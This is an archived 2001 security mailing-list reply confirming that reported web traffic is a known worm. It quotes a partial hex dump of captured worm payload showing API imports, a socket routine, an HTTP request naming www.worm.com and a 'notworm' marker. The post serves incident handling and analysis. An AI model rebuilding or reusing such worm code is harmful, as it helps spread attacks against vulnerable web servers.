Re: Strange web traffic

From: Ryan Russell (ryanat_private)
Date: Tue Jul 17 2001 - 13:03:39 PDT

  • Next message: Ken Eichman: "Re(2): Strange web traffic"

    That is indeed a worm, though you're missing the first part of the
    conversation.
    
    This is the worm that Marc from eeye has been posting about, I saw a post
    to incidents about it arrive shortly before this one, forwarded from
    Aleph1.
    
    						Ryan
    
    On Tue, 17 Jul 2001, Scott Nursten wrote:
    
    > 0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
    > 0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
    > 0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
    > 0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
    > 0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
    > 0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
    > 0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
    > 0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
    > 0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
    > 0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
    > 0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
    > 0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
    > 0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
    > 0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
    > 0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
    > 0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
    > 0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
    > 0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
    > 0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
    > 0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 13:59:03 PDT